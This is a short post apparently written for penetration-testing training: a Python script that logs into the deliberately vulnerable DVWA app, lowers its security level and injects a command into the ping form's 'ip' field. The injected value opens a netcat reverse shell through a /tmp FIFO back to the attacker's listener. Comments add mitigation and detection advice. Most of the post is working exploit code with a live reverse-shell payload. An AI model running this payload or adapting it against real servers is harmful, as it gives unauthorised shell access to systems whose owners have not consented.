Damn Vulnerable Web Application (DVWA) is an intentionally vulnerable web application used for training. DVWA is also one of the web applications on the OWASP Broken Web Applications Virtual Machine. This post is nothing more than a script that automates the exploitation of DVWA's OS command injection vulnerability, using the third-party Python mechanize module for browser automation.
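# Tested on Windows against DVWA within the OWASP Broken Web App VM Version 1.2
#
# What this shows: the 'ip' field of DVWA's command injection page
# (/dvwa/vulnerabilities/exec/) is submitted with a value that contains the
# shell operator '&&'.  The payload only works because the server hands that
# field to a shell without filtering, so everything after '&&' runs as extra
# commands under the web server's account.
#
# Mitigation on the server side: treat the field as data, not as shell text.
# Validate it as an IP address or hostname and run the ping binary with an
# argument vector instead of a shell string.
#
# Detection: shell metacharacters ('&&', '|', '<', '>') in the submitted 'ip'
# parameter, the web server account spawning /bin/sh, mknod or nc, a FIFO
# appearing under /tmp, and an outbound TCP connection from the web server.

import os
import re
import sys

import mechanize

USAGE = "usage: %s <rhost> <lhost> <lport>"

# Both host values end up inside command strings (lhost in the injected
# payload, lport in the local os.system() call), so only characters that
# have no meaning to a shell are accepted.
_HOST_RE = re.compile(r'[A-Za-z0-9.\-:]+\Z')
_PORT_RE = re.compile(r'[0-9]{1,5}\Z')


def _host_arg(value, label):
    """Return value unchanged if it looks like a host name or IP address.

    Exits with a message naming the offending argument otherwise.
    """
    if not _HOST_RE.match(value):
        sys.exit("%s must be an IP address or host name, got %r" % (label, value))
    return value


def _port_arg(value):
    """Return value as a normalised decimal string if it is a TCP port (1-65535).

    Exits with a message otherwise.
    """
    if not _PORT_RE.match(value) or not 1 <= int(value) <= 65535:
        sys.exit("lport must be a port number between 1 and 65535, got %r" % (value,))
    return str(int(value))


# The original indexed sys.argv directly and died with a bare IndexError when
# an argument was missing; fail with a usage line instead.
if len(sys.argv) < 4:
    sys.exit(USAGE % sys.argv[0])

rhost = _host_arg(sys.argv[1], "rhost")  # IP address of target DVWA application
lhost = _host_arg(sys.argv[2], "lhost")  # IP address of where you are catching the shell
lport = _port_arg(sys.argv[3])           # Port where you want to catch the shell


def listener():
    """Opens a command prompt and starts a netcat listener.

    Windows only: relies on 'start cmd.exe' and on nc being on PATH.
    lport has been validated as a number above, so nothing but digits is
    appended to the command string passed to os.system().
    """
    os.system(r'start cmd.exe /k "nc -lvp" ' + str(lport))


def browse_and_exploit():
    """Logs into DVWA, sets security to low, and injects a payload.

    Each step selects form number 0 on the page it has just opened and
    submits it; no response is inspected, so a failed login is not detected.
    """
    br = mechanize.Browser()  # create a browser object

    # Log in with the admin/admin account the script assumes on the VM.
    br.open("http://" + rhost + '/dvwa/login.php')  # navigate to DVWA
    br.select_form(nr=0)  # select the first (and only) form
    br.form['username'] = 'admin'  # fill in the login page
    br.form['password'] = 'admin'
    br.submit()  # submit the form

    # Switch DVWA to its "low" security level.
    br.open('http://' + rhost + '/dvwa/security.php')  # opens the security page
    br.select_form(nr=0)  # selects the form
    br.form['security'] = ["low"]  # changes the security setting to low
    br.submit()

    br.open('http://' + rhost + '/dvwa/vulnerabilities/exec/')  # open command injection page
    br.select_form(nr=0)  # select the form
    # Uses netcat on the target server to shovel a shell back to the listener.
    # 'google.com' fills the field's expected role; '&&' is what the server's
    # shell interprets as "run the next command too".
    br.form['ip'] = 'google.com && rm -f /tmp/backpipe && mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc %s %s 1>/tmp/backpipe' % (lhost, lport)
    br.submit()  # submits the form and the shell should come


def main():
    """Start the local listener first, then drive the browser session."""
    listener()
    browse_and_exploit()


if __name__ == '__main__':
    main()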